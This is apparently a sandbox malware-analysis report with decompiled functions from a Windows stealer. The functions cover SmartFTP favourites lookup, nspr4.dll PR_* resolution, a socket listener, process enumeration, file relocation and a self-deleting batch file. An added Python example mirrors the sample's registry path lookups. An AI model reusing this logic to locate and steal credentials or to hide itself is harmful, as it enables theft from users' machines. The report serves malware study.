                C-Code - Quality: 72%
                			E0040F88A(void* _a4, WCHAR* _a8) {
                				char _v524;
                				void* __edi;
                				void* __esi;
                				void** _t8;
                				void* _t13;
                				void* _t18;
                				WCHAR* _t24;
                				WCHAR* _t30;
                
                				_t8 =  &_a4;
                				_push(_t8);
                				_push(_a4);
                				_t18 = 0;
                				L00415956(); // ConvertSidToStringSidW(_a4, &_a4): _a4 now points at the string SID
                				if(_t8 != 0) {
                					_push(_a4);
                					_t24 =  &_v524;
                					if(E0040A4B7(_t8, 0x104, _t24, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\%s") > 0) { // ProfileList\<SID>
                						_t30 = _t24;
                						_t13 = E0040ED7B(0x104, _t30, 0x80000002, _t24, L"ProfileImagePath"); // 0x80000002 = HKEY_LOCAL_MACHINE
                						if(_t13 != 0 && _t13 != 0xffffffff) {
                							PathUnquoteSpacesW(_t30); // strip surrounding quotes from the value
                							ExpandEnvironmentStringsW(_t30, _a8, 0x104); // e.g. %SystemDrive%\Users\<name> -> C:\Users\<name>
                							asm("sbb bl, bl");
                							_t18 = 1;
                						}
                					}
                					LocalFree(_a4); // free the string SID
                				}
                				return _t18;
                			}

                Decompiled-line addresses: 0x0040f894 to 0x0040f916

                APIs
                • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040F89D
                • PathUnquoteSpacesW.SHLWAPI(?,80000002,?,ProfileImagePath,.exe,00000000,00000000), ref: 0040F8EA
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0040F8F7
                • LocalFree.KERNEL32(?,.exe,00000000,00000000), ref: 0040F90A
                Strings
                • .exe, xrefs: 0040F8A7
                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 0040F8B0
                • ProfileImagePath, xrefs: 0040F8CA
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: ConvertEnvironmentExpandFreeLocalPathSpacesStringStringsUnquote
                • String ID: .exe$ProfileImagePath$SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
                • API String ID: 1452230276-4100006056
                • Opcode ID: df0a2b4d316724797dba8bfe24f87b7a89b574f8b18fab32434f215cfaf68c8d
                • Instruction ID: 4a3e77216fc57d26c38a6f801ce880884a188e00e35209db20c52cd4a7b06c5b
                • Opcode Fuzzy Hash: df0a2b4d316724797dba8bfe24f87b7a89b574f8b18fab32434f215cfaf68c8d
                • Instruction Fuzzy Hash: 4C012EB22002047BCB202A66DD08E8B3E58DB80370B000233BC54F72E0DB78D958C698
                Uniqueness

                Uniqueness Score: -1.00%
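Both E00407219 (SmartFTP favourites and backup folders under HKCU) and E0040F88A (a user's profile directory from a SID via HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<SID>\ProfileImagePath) follow one pattern: read a REG string, strip surrounding quotes, expand %VAR% references. The Python below is an added example, not code from the report or from the sample, that reproduces that pattern offline against a constructed in-memory stand-in for the registry; the SID, user name and paths are invented, and the hive and environment are passed in so the same functions can run over values exported from a real system. Note that the sample's lower-case "smartftp\client 2.0" key path works because registry key and value names are compared case-insensitively, which the lookup mirrors.

```python
import re
from typing import Dict, List, Optional

HKEY_CURRENT_USER = 0x80000001    # root constants as they appear in the decompiled calls
HKEY_LOCAL_MACHINE = 0x80000002
MAX_PATH = 0x104

# Offline stand-in for the registry: {root: {key_path: {value_name: data}}}.
Hive = Dict[int, Dict[str, Dict[str, str]]]

# Constructed sample hive; SID, user name and paths are invented for this example.
# Key and value names deliberately differ in case from what the sample queries.
SAMPLE_HIVE: Hive = {
    HKEY_LOCAL_MACHINE: {
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1111-2222-3333-1001": {
            "ProfileImagePath": r'"%SystemDrive%\Users\alice"',
        },
    },
    HKEY_CURRENT_USER: {
        r"SOFTWARE\SmartFTP\Client 2.0\Settings\General\Favorites": {
            "Personal Favorites": r"%APPDATA%\SmartFTP\Client 2.0\Favorites",
        },
        r"SOFTWARE\SmartFTP\Client 2.0\Settings\Backup": {
            "Folder": r"%APPDATA%\SmartFTP\Client 2.0\Backup",
        },
    },
}

SAMPLE_ENV = {"SystemDrive": "C:", "APPDATA": r"C:\Users\alice\AppData\Roaming"}


def reg_read_string(hive: Hive, root: int, subkey: str, value: str) -> Optional[str]:
    """Case-insensitive lookup, as the registry does it; None when key or value is absent."""
    for key_path, values in hive.get(root, {}).items():
        if key_path.lower() != subkey.lower():
            continue
        for name, data in values.items():
            if name.lower() == value.lower():
                return data
    return None


def path_unquote_spaces(path: str) -> str:
    """PathUnquoteSpacesW: remove one pair of surrounding double quotes."""
    if len(path) >= 2 and path[0] == '"' and path[-1] == '"':
        return path[1:-1]
    return path


def expand_environment_strings(s: str, env: Dict[str, str]) -> str:
    """ExpandEnvironmentStringsW: %NAME% is matched case-insensitively; unknown names stay as-is."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lookup.get(m.group(1).lower(), m.group(0)), s)


def profile_path_for_sid(hive: Hive, env: Dict[str, str], sid: str) -> Optional[str]:
    """Mirror of E0040F88A: string SID -> ProfileList\\<SID>\\ProfileImagePath -> unquote -> expand."""
    subkey = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s" % sid
    if len(subkey) >= MAX_PATH:          # the sample formats into a 0x104-WCHAR buffer
        return None
    raw = reg_read_string(hive, HKEY_LOCAL_MACHINE, subkey, "ProfileImagePath")
    if not raw:                          # E0040ED7B's callers skip -1 (error) and 0 (empty)
        return None
    return expand_environment_strings(path_unquote_spaces(raw), env)


def smartftp_paths(hive: Hive, env: Dict[str, str]) -> List[str]:
    """Mirror of E00407219: the two SmartFTP locations it collects, expanded."""
    wanted = [
        (r"SOFTWARE\smartftp\client 2.0\settings\general\favorites", "personal favorites"),
        (r"SOFTWARE\smartftp\client 2.0\settings\backup", "folder"),
    ]
    found: List[str] = []
    for subkey, value in wanted:
        raw = reg_read_string(hive, HKEY_CURRENT_USER, subkey, value)
        if raw:
            found.append(expand_environment_strings(raw, env))
    return found


if __name__ == "__main__":
    print(profile_path_for_sid(SAMPLE_HIVE, SAMPLE_ENV, "S-1-5-21-1111-2222-3333-1001"))
    print(smartftp_paths(SAMPLE_HIVE, SAMPLE_ENV))
```

On a live system the same functions can be fed from a parsed SOFTWARE hive or an NTUSER.DAT export; the expansion step is what turns the stored %SystemDrive% and %APPDATA% references into the on-disk paths the sample goes on to read.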

                C-Code - Quality: 100%
                			E0041415B(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				_Unknown_base(*)()* _t12;
                				struct HINSTANCE__* _t14;
                
                				 *0x41ac54 =  *0x41ac54 & 0x00000000;
                				 *0x41ac58 =  *0x41ac58 & 0x00000000;
                				_t14 = __eax;
                				InitializeCriticalSection(0x41ac38);
                				 *0x41ac50 = _a4;
                				 *0x41ac2c = _a8;
                				 *0x41ac5c = _a12;
                				 *0x41ac30 = _t14;
                				 *0x41ac28 = _a16;
                				 *0x41ac24 = GetProcAddress(_t14, "PR_GetNameForIdentity"); // _t14: nspr4.dll module handle
                				 *0x41ac34 = GetProcAddress( *0x41ac30, "PR_SetError");
                				_t12 = GetProcAddress( *0x41ac30, "PR_GetError");
                				 *0x41ab54 = _t12;
                				return _t12;
                			}

                Decompiled-line addresses: 0x0041415b to 0x004141d9

                APIs
                • InitializeCriticalSection.KERNEL32(0041AC38,74B04EE0,00404E2D,00419140,00000000,?,00000000,00407783,?,00000000), ref: 00414171
                • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 004141AD
                • GetProcAddress.KERNEL32(PR_SetError), ref: 004141BF
                • GetProcAddress.KERNEL32(PR_GetError), ref: 004141D1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalInitializeSection
                • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
                • API String ID: 2804437462-2578621715
                • Opcode ID: 6d94cf3b99f3e6987cc50b6a1c9a114de759b8df395e83fe97acb6e68dd810cd
                • Instruction ID: 5ec90880f5ed00e410c12ff35b169b57a65e5ff92478b4a826f33af8613d71d6
                • Opcode Fuzzy Hash: 6d94cf3b99f3e6987cc50b6a1c9a114de759b8df395e83fe97acb6e68dd810cd
                • Instruction Fuzzy Hash: DC01A475A463549FC711CF64EE48A867FE0FB08365B10883BF404A32A1EBB854609FCA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00411226(void* __ecx, void* __eflags) {
                				intOrPtr _v74;
                				signed int _v78;
                				char _v124;
                				char _v128;
                				intOrPtr _v140;
                				void* _v144;
                				intOrPtr _v148;
                				void* _v152;
                				void* _v156;
                				void* _v160;
                				char _v164;
                				void* _v168;
                				signed int _v172;
                				long _v184;
                				void* __esi;
                				void* _t47;
                				void* _t49;
                				void* _t55;
                				void* _t56;
                				void* _t57;
                				long _t59;
                				intOrPtr _t64;
                				long _t65;
                				void* _t72;
                				signed int _t83;
                				intOrPtr* _t85;
                				signed int _t94;
                				long _t97;
                				signed int _t98;
                				void* _t100;
                
                				_t100 = (_t98 & 0xfffffff8) - 0xac;
                				_t83 = 2;
                				_t47 = E00407A11(__ecx, 0x743c152e, _t83); // E00407A11 wraps CreateMutexW; seed 0x743c152e; nonzero = run the listener
                				_v156 = _t47;
                				if(_t47 != 0) {
                					if(E00407B3F() == 0) {
                						L26:
                						E0040DD1D(_v148);
                						_t49 = 0;
                						L27:
                						return _t49;
                					}
                					E00413EC0(__ecx,  &_v124);
                					_t87 = _v78;
                					_t94 = E004110DC( &_v160, _v78,  &_v168) & 0x0000ffff;
                					if(_t94 != 0) {
                						L7:
                						if(_t94 != _v74) {
                							E00413F57( &_v124);
                							_v78 = _t94;
                							E00413FAF( &_v128);
                						}
                						_t55 =  *0x419798; // 0x12c
                						_v144 = _t55;
                						_t56 = _v152;
                						_v172 = 1;
                						if(_t56 != 0) {
                							_v140 = _t56;
                							_v172 = _t83;
                						}
                						_t57 = _v160;
                						if(_t57 != 0) {
                							_t87 = _v172;
                							_v172 = _v172 + 1;
                							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
                						}
                						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff); // INFINITE wait on {global handle 0x419798, socket event(s)}
                						if(_t59 <= 0) {
                							L25:
                							E0040CBD4(_t59, _v156);
                							E0040CBD4(CloseHandle(_v152), _v164);
                							CloseHandle(_v160);
                							goto L26;
                						} else {
                							_t85 = __imp__#1; // ws2_32 ordinal 1 = accept
                							while(_t59 < _v172) {
                								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
                								if(_t64 != _v152) {
                									if(_t64 != _v160) {
                										while(1) {
                											L23:
                											_t65 =  *_t85(_v168, 0, 0);
                											_t97 = _t65;
                											if(_t97 == 0xffffffff) {
                												break;
                											}
                											__imp__WSAEventSelect(_t97, 0, 0); // detach the event from the accepted socket
                											_v156 = 0;
                											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0); // 0x8004667e = FIONBIO with 0: back to blocking mode
                											E0040CC2C(_t87, _t97);
                											if(E0040F70A(0x20000, E00411159, _t97) == 0) { // one worker thread per client (0x20000-byte stack, routine E00411159); on failure the socket is closed
                												E0040CBD4(_t69, _t97);
                											}
                										}
                										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
                										if(_t59 > 0) {
                											continue;
                										}
                										goto L25;
                									}
                									_t72 = _v164;
                									L20:
                									_v168 = _t72;
                									goto L23;
                								}
                								_t72 = _v156;
                								goto L20;
                							}
                							goto L25;
                						}
                					}
                				while(WaitForSingleObject( *0x419798, 0x3e8) == 0x102) { // 0x3e8 = 1 s: retry the listener setup until the global handle signals
                						_t87 = _v74;
                						_t94 = E004110DC( &_v156, _v74,  &_v164) & 0x0000ffff;
                						if(_t94 == 0) {
                							continue;
                						}
                						break;
                					}
                					if(_t94 == 0) {
                						goto L26;
                					}
                					goto L7;
                				}
                				_t49 = 1;
                				goto L27;
                			}

                Decompiled-line addresses: 0x0041122c to 0x00411405

                APIs
                  • Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32
                • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00411291
                • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00411322
                • accept.WS2_32(?,00000000,00000000), ref: 004113AE
                • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004113C2
                • CloseHandle.KERNEL32(?), ref: 004113E3
                • CloseHandle.KERNEL32(?), ref: 004113F2
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
                • String ID:
                • API String ID: 38240579-0
                • Opcode ID: 80098c103e0d020010c3c53ca27bf8201dfd7e2c32820faa17c90fa6cd5b0338
                • Instruction ID: 78bb88af478c80c03581daf2a3abdac406f8bc5f6239fc56277288a4d92166c3
                • Opcode Fuzzy Hash: 80098c103e0d020010c3c53ca27bf8201dfd7e2c32820faa17c90fa6cd5b0338
                • Instruction Fuzzy Hash: B9516C71508304AFD710EF65D884CAFB7E9EBC5714F200A2EFAA5E31A0D7349D858B5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00413BF3() {
                				char _v5;
                				signed int _v12;
                				signed int _v16;
                				void* _v20;
                				int _v24;
                				void* _v28;
                				char _v32;
                				long _v580;
                				void* _v588;
                				void* __esi;
                				void* _t42;
                				struct tagPROCESSENTRY32W* _t45;
                				signed int _t47;
                				void* _t48;
                				long _t56;
                				intOrPtr* _t57;
                				void** _t59;
                				void** _t60;
                				void** _t62;
                				long _t65;
                				int _t71;
                				void** _t72;
                				void* _t73;
                
                				_t71 = 0;
                				_v5 = 0;
                				_v16 = 0;
                				_v12 = 0;
                				while(1) {
                					_t42 = CreateToolhelp32Snapshot(2, _t71);
                					_v20 = _t42;
                					_v24 = _t71;
                					if(_t42 == 0xffffffff) {
                						break;
                					} else {
                						_t45 =  &_v588;
                						_v588 = 0x22c;
                						Process32FirstW(_v20, _t45);
                					}
                					while(_t45 != 0) {
                						_t65 = _v580;
                						__eflags = _t65 - _t71;
                						if(_t65 <= _t71) {
                							L20:
                							_t45 = Process32NextW(_v20,  &_v588);
                							continue;
                						}
                						__eflags = _t65 -  *0x419544; // 0xff0
                						if(__eflags == 0) {
                							goto L20;
                						}
                						_t47 = 0;
                						__eflags = _v12 - _t71;
                						if(_v12 <= _t71) {
                							L8:
                							_t48 = E0040797B(_t65, _t70, _t65);
                							_v28 = _t48;
                							__eflags = _t48 - _t71;
                							if(_t48 == _t71) {
                								goto L20;
                							}
                							_t73 = OpenProcess(0x400, _t71, _v580);
                							__eflags = _t73 - _t71;
                							if(_t73 == _t71) {
                								L19:
                								CloseHandle(_v28);
                								goto L20;
                							}
                							_t72 = E0040F311(_t65, _t73,  &_v32);
                							CloseHandle(_t73);
                							__eflags = _t72;
                							if(_t72 == 0) {
                								L18:
                								_t71 = 0;
                								__eflags = 0;
                								goto L19;
                							} else {
                								__eflags = _v32 -  *0x4192e0; // 0x1
                								if(__eflags == 0) {
                									_t56 = GetLengthSid( *_t72);
                									__eflags = _t56 -  *0x4192d8;
                									if(_t56 ==  *0x4192d8) {
                										_t57 =  *0x4192d4; // 0x201f7d0
                										_t59 = E00409868( *_t57,  *_t72, _t56);
                										__eflags = _t59;
                										if(_t59 == 0) {
                											_t60 = E00409787(4 + _v12 * 4,  &_v16);
                											__eflags = _t60;
                											if(_t60 != 0) {
                												_t70 = _v12;
                												_v12 = _v12 + 1;
                												_v24 = _v24 + 1;
                												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
                												_t62 = E00413B6A(_v16, _v580, _v28);
                												__eflags = _t62;
                												if(_t62 != 0) {
                													_v5 = 1;
                												}
                											}
                										}
                									}
                								}
                								E004097F7(_t72);
                								goto L18;
                							}
                						} else {
                							goto L6;
                						}
                						while(1) {
                							L6:
                							_t70 = _v16;
                							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
                							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
                								goto L20;
                							}
                							_t47 = _t47 + 1;
                							__eflags = _t47 - _v12;
                							if(_t47 < _v12) {
                								continue;
                							}
                							goto L8;
                						}
                						goto L20;
                					}
                					CloseHandle(_v20);
                					if(_v24 != _t71) {
                						continue;
                					}
                					break;
                				}
                				E004097F7(_v16);
                				return _v5;
                			}

                (Per-line instruction address column for E00413BF3, spanning 0x00413c05 to 0x00413d69, not reproduced in this extraction.)

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413C14
                • Process32FirstW.KERNEL32(0040808A,?), ref: 00413C3C
                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000), ref: 00413C96
                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00413CB3
                • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00413CC6
                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00413D33
                • Process32NextW.KERNEL32(0040808A,0000022C), ref: 00413D3F
                • CloseHandle.KERNEL32(0040808A,?,?,00000000), ref: 00413D4F
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
                • String ID:
                • API String ID: 1981844004-0
                • Opcode ID: 55e17d62d64d8e0536130c74840e60f1853602f54c2fa748d326bdb61bfc65a4
                • Instruction ID: 25d894fc2888be2c27f1fba0c79735ae16ee64a55ae2a5180fa541943dfd7bc8
                • Opcode Fuzzy Hash: 55e17d62d64d8e0536130c74840e60f1853602f54c2fa748d326bdb61bfc65a4
                • Instruction Fuzzy Hash: 06419D71800119EBCF21EFA5ED859EEBBB5EF85306F1004AAE514B3261D7395EC1CB18
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 99%
                			E00411E7C(WCHAR* __ecx, short _a4) {
                				char _v268;
                				char _v697;
                				signed char _v764;
                				signed char _v800;
                				char _v1012;
                				short _v1532;
                				short _v1536;
                				signed int _v1540;
                				short _v1544;
                				void* _v1548;
                				intOrPtr _v1552;
                				intOrPtr _v1556;
                				char _v1560;
                				intOrPtr _v1564;
                				signed int _v1568;
                				signed int _v1572;
                				void* _v1573;
                				signed int _v1576;
                				void* __ebx;
                				void* __esi;
                				signed int _t54;
                				void* _t55;
                				signed int _t63;
                				signed char _t65;
                				signed int _t67;
                				signed int _t75;
                				signed int _t78;
                				long _t79;
                				long _t80;
                				signed int _t84;
                				void* _t87;
                				signed int _t90;
                				signed int _t93;
                				signed int _t100;
                				signed int _t102;
                				signed char _t118;
                				signed int _t121;
                				short _t125;
                				void* _t128;
                				WCHAR* _t131;
                
                				_t122 = __ecx;
                				_t125 = _a4;
                				_t54 = E00407A11(__ecx, (0 |  *_t125 != 0x00000000) + 0x78d0c213, 2);
                				_v1572 = _t54;
                				if(_t54 != 0) {
                					_t55 =  *0x419798; // 0x12c
                					_v1548 = _t55;
                					_v1544 =  &_v268;
                					_v1556 = E00411CD8;
                					_v1552 = E00411E14;
                					_v1536 = _t125;
                					E00407B53( &_v1012);
                					E00409833( &_v268,  &_v697, 0x102);
                					_t63 =  *_t125 & 0x000000ff;
                					__eflags = _t63;
                					if(_t63 == 0) {
                						_t65 = _v800 >> 8;
                						__eflags = _t65;
                						_v1568 = _t65 & 0x000000ff;
                						_t67 = _v800 & 0x000000ff;
                						goto L7;
                					} else {
                						__eflags = _t63 == 1;
                						if(_t63 == 1) {
                							_v1568 = _v764 >> 0x00000008 & 0x000000ff;
                							_t67 = _v764 & 0x000000ff;
                							L7:
                							_v1572 = _t67;
                						}
                					}
                					_v1568 = _v1568 * 0xea60;
                					_v1572 = _v1572 * 0xea60;
                					E004098AA( &_v1012,  &_v1012, 0, 0x2e4);
                					_v1544 = 0;
                					_t75 = E00407B3F();
                					__eflags = _t75;
                					if(_t75 != 0) {
                						do {
                							__eflags =  *_t125;
                							_v1573 = 1;
                							if( *_t125 != 0) {
                								L23:
                								_t78 = E00410CA6(_t122);
                								_t130 = _t78;
                								__eflags = _t78;
                								if(__eflags == 0) {
                									goto L32;
                								} else {
                									_v1572 = E00410520(0, _t123, __eflags, _t130, 0x4e23, 0x10000000);
                									E004097F7(_t130);
                									__eflags = _v1576;
                									if(_v1576 == 0) {
                										L28:
                										_t118 = _v1573;
                									} else {
                										_v1540 = _v1540 & 0;
                										_t100 = E00411A9D(_t122, _t123,  &_v1540, 1);
                										__eflags = _t100;
                										if(_t100 == 0) {
                											goto L28;
                										} else {
                											 *(_t125 + 8) =  *(_t125 + 8) | 0xffffffff;
                											_t102 = E00412279( &_v1560);
                											__eflags = _t102;
                											_t118 = (0 | _t102 != 0x00000000) - 0x00000001 & 0x00000002;
                											E00410951(_t125 + 8);
                											E004097F7(_v1540);
                										}
                									}
                									E004097F7(_v1560);
                									__eflags = _t118 - 2;
                									if(_t118 != 2) {
                										_t79 = _v1568;
                										__eflags = _t118;
                										if(_t118 != 0) {
                											goto L32;
                										}
                									} else {
                										_t79 = _v1572;
                									}
                								}
                							} else {
                								asm("sbb ebx, ebx");
                								E00411954( !( ~(_v1532 & 0x0000ffff)) &  &_v1532, _t122, 0);
                								_t131 = _t125 + 0x122;
                								_t84 = GetFileAttributesW( &_v1536);
                								__eflags = _t84 - 0xffffffff;
                								if(_t84 == 0xffffffff) {
                									_t84 = GetFileAttributesW(L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik");
                									__eflags = _t84 - 0xffffffff;
                									if(_t84 == 0xffffffff) {
                										goto L32;
                									} else {
                										_t122 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik";
                										goto L14;
                									}
                								} else {
                									_t122 =  &_v1532;
                									L14:
                									_t123 = _t131;
                									E00409AD3(_t84 | 0xffffffff, _t122, _t123);
                									_t87 = E0040B18C(_t123, _t131);
                									__eflags = _t87 - 0xffffffff;
                									if(_t87 != 0xffffffff) {
                										L16:
                										__eflags = _t123;
                										if(__eflags > 0) {
                											goto L27;
                										} else {
                											if(__eflags < 0) {
                												L19:
                												_t90 = lstrcmpiW(_t131,  &_v1532);
                												__eflags = _t90;
                												if(_t90 == 0) {
                													goto L23;
                												} else {
                													_t121 = E00407A11(_t122, 0x8793aef0, 2);
                													__eflags = _t121;
                													if(_t121 == 0) {
                														goto L32;
                													} else {
                														_t93 = MoveFileExW(_t131,  &_v1532, 0xb);
                														__eflags = _t93;
                														if(_t93 == 0) {
                															goto L32;
                														} else {
                															E0040DD1D(_t121);
                															__eflags = _t93 | 0xffffffff;
                															_t122 =  &_v1536;
                															_t123 = _t131;
                															E00409AD3(_t93 | 0xffffffff,  &_v1536, _t131);
                															goto L23;
                														}
                													}
                												}
                											} else {
                												__eflags = _t87 - 0xffffffff;
                												if(_t87 > 0xffffffff) {
                													goto L27;
                												} else {
                													goto L19;
                												}
                											}
                										}
                									} else {
                										__eflags = _t123;
                										if(_t123 == 0) {
                											L27:
                											E0040B1CD(_t131);
                											L32:
                											_t79 = 0x7530;
                										} else {
                											goto L16;
                										}
                									}
                								}
                							}
                							_t80 = WaitForSingleObject( *0x419798, _t79);
                							__eflags = _t80 - 0x102;
                						} while (_t80 == 0x102);
                					}
                					E0040DD1D(_v1564);
                					_t128 = 0;
                				} else {
                					_t128 = 1;
                				}
                				E004097F7(_t125);
                				return _t128;
                			}

                (Per-line instruction address column for E00411E7C, spanning 0x00411e7c to 0x00412128, not reproduced in this extraction.)

                APIs
                  • Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32
                • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002E4,?,?,00000102), ref: 00411FCA
                • lstrcmpiW.KERNEL32(?,?,?), ref: 00412022
                • MoveFileExW.KERNEL32(?,?,0000000B,8793AEF0,00000002), ref: 0041204A
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$AttributesCreateFreeHeapMoveMutexlstrcmpi
                • String ID: C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik
                • API String ID: 1600310851-4237285778
                • Opcode ID: 28b3f19588a2acba39d3beb5b006fb2b127ad07ddcdf98b9e457a8b6b7a0439d
                • Instruction ID: 26a87faf6bb2eb0c63d07739b0bb6026e2e707ae1a0b685e3e67b5e10d26ea3a
                • Opcode Fuzzy Hash: 28b3f19588a2acba39d3beb5b006fb2b127ad07ddcdf98b9e457a8b6b7a0439d
                • Instruction Fuzzy Hash: 8D61E271608351AAC310EF65C981AEFBBD4EF85314F000A2FF694E62D1D778CA95C75A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E0040EABE(void* __ebx, char _a4) {
                				short _v24;
                				intOrPtr _v28;
                				char _v72;
                				short _v592;
                				char _v852;
                				char _v1392;
                				void* __edi;
                				void* _t33;
                				char _t55;
                
                				if(E0040B1EE(L"bat",  &_v592) == 0) {
                					L7:
                					return 0;
                				}
                				CharToOemW( &_v592,  &_v852);
                				_push( &_v852);
                				if(E0040A545( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
                					L6:
                					E0040B1CD( &_v592);
                					goto L7;
                				}
                				_t33 = E0040AFDF(_t30,  &_v592, _a4);
                				E004097F7(_a4);
                				if(_t33 == 0) {
                					goto L6;
                				}
                				_push( &_v592);
                				if(E0040A4B7( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
                					goto L6;
                				} else {
                					_t55 = 0x44;
                					E004098AA( &_v72,  &_v72, 0, _t55);
                					_v24 = 0;
                					_v72 = _t55;
                					_v28 = 1;
                					return E0040F5C2( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t46 != 0x00000000;
                				}
                			}

                (Per-line instruction address column for E0040EABE, spanning 0x0040eadb to 0x0040ebc4, not reproduced in this extraction.)

                APIs
                  • Part of subcall function 0040B1EE: GetTempPathW.KERNEL32(000000F6,?), ref: 0040B205
                • CharToOemW.USER32 ref: 0040EAEF
                  • Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
                  • Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
                  • Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000), ref: 0040EB6E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
